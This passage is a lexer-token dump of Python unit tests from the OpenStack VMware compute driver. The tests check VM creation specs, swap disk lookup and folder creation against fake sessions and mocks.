name|'extra_config'
op|'.'
name|'value'
op|'='
number|'2000000'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'keyboard.typematicMinDelay'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_cores_per_socket
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_cores_per_socket'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cores_per_socket'
op|'='
number|'4'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'numCoresPerSocket'
op|'='
number|'4'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_memory_allocations
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_memory_allocations'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'memory_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'memory_limits'
op|'='
name|'memory_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'memory_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'memory_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'memoryAllocation'
op|'='
name|'memory_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_swap
dedent|''
name|'def'
name|'test_get_swap'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
newline|'\n'
nl|'\n'
comment|'# Root disk'
nl|'\n'
name|'controller_key'
op|'='
number|'1000'
newline|'\n'
name|'root_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'root_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'root_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1048576'
newline|'\n'
name|'root_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
nl|'\n'
comment|'# Swap disk'
nl|'\n'
name|'swap_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'swap_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|'"swap"'
newline|'\n'
name|'swap_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1024'
newline|'\n'
name|'swap_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'root_disk'
op|','
name|'swap_disk'
op|']'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'devices'
op|')'
name|'as'
name|'mock_call'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'='
name|'vm_util'
op|'.'
name|'get_swap'
op|'('
name|'session'
op|','
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
name|'mock_call'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|'"get_object_property"'
op|','
name|'vm_ref'
op|','
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'swap_disk'
op|','
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_with_empty_vmfolder
dedent|''
dedent|''
name|'def'
name|'test_create_folder_with_empty_vmfolder'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when the datacenter vmFolder is empty"""'
newline|'\n'
name|'child_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'child_folder'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'None'
op|','
name|'child_folder'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_folder'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_calls'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_calls'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'call_args_list'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_not_present
dedent|''
dedent|''
name|'def'
name|'test_create_folder_not_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when child not present."""'
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
op|']'
newline|'\n'
name|'child_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'child_folder'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
name|'child_folder'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_folder'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_already_present
dedent|''
dedent|''
name|'def'
name|'test_create_folder_already_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test create_folder when child already present."""'
newline|'\n'
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_1'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_1'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_1_name'
op|'='
string|"'SomeOtherName'"
newline|'\n'
name|'child_entity_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_2'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_2_name'
op|'='
string|"'AnotherName'"
newline|'\n'
name|'child_entity_3'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_3'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'child_entity_3_name'
op|'='
name|'child_name'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity_1'
op|','
name|'child_entity_2'
op|','
nl|'\n'
name|'child_entity_3'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
nl|'\n'
name|'child_entity_1_name'
op|','
nl|'\n'
name|'child_entity_2_name'
op|','
nl|'\n'
name|'child_entity_3_name'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_entity_3'
op|','
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_1'
op|','
nl|'\n'
string|"'name'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_2'
op|','
nl|'\n'
string|"'name'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity_3'
op|','
nl|'\n'
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_folder_with_duplicate_name
dedent|''
dedent|''
name|'def'
name|'test_create_folder_with_duplicate_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'parent_folder'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'parent_folder'
newline|'\n'
name|'parent_folder'
op|'.'
name|'value'
op|'='
string|"'parent-ref'"
newline|'\n'
name|'child_name'
op|'='
string|"'child_folder'"
newline|'\n'
nl|'\n'
name|'prop_val_1'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val_1'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'child_entity_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity_2'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val_2'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val_2'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity_2'
op|']'
newline|'\n'
name|'child_entity_2_name'
op|'='
name|'child_name'
newline|'\n'
nl|'\n'
name|'details'
op|'='
op|'{'
string|"'object'"
op|':'
string|"'folder-1'"
op|'}'
newline|'\n'
name|'duplicate_exception'
op|'='
name|'vexc'
op|'.'
name|'DuplicateName'
op|'('
name|'details'
op|'='
name|'details'
op|')'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val_1'
op|','
nl|'\n'
name|'duplicate_exception'
op|','
nl|'\n'
name|'prop_val_2'
op|','
nl|'\n'
name|'child_entity_2_name'
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'create_folder'
op|'('
name|'session'
op|','
name|'parent_folder'
op|','
name|'child_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'child_entity_2'
op|'.'
name|'_type'
op|','
name|'ret'
op|'.'
name|'_type'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'parent_folder'
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
string|"'CreateFolder'"
op|','
nl|'\n'
name|'parent_folder'
op|','
name|'name'
op|'='
name|'child_name'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_does_not_exist
dedent|''
dedent|''
name|'def'
name|'test_get_folder_does_not_exist'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_not_folder
dedent|''
dedent|''
name|'def'
name|'test_get_folder_child_entry_not_folder'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'NotFolder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'prop_val'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_not_matched
dedent|''
dedent|''
name|'def'
name|'test_get_folder_child_entry_not_matched'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
string|"'fake-1-name'"
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity'
op|','
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_matched
dedent|''
dedent|''
name|'def'
